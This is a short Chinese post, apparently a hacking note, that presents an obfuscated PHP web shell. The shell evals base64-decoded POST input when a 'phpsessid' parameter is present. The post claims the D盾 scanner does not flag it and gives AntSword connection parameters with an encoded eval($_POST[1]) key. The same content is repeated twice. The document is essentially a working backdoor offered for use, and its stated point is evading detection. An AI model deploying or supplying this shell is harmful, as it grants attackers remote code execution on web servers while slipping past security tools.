<?php if(isset($_REQUEST[‘phpsessid‘])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST[‘key‘],3)); eval(B::$d); } ?>
D盾查杀无提示
利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」
中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1
连接成功
<?php if(isset($_REQUEST[‘phpsessid‘])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST[‘key‘],3)); eval(B::$d); } ?>
D盾查杀无提示
利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」
中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1
连接成功